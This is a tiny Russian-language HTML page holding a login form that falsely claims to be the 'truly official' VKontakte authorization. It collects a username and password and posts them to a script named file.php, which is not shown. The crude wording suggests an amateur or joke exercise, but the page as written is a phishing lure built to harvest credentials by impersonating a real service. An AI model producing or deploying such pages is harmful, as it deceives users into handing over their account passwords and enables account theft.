<!DOCTYPE html>
<html lang="ru" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title>Тутуту</title>
  </head>
  <body>
    <form action="file.php" method="post">
      <fieldset>
        <legend>Авторизация вкантакте правда афициальная</legend>
        <label>логин<input name = "login" type="login" required placeholder="sosiska"></label>
        <label>пароль<input name = "password" type="password" required placeholder="11111112"></label>
        <label><input type="submit" value="Отправить"></label>
      </fieldset>
    </form>
  </body>
</html>
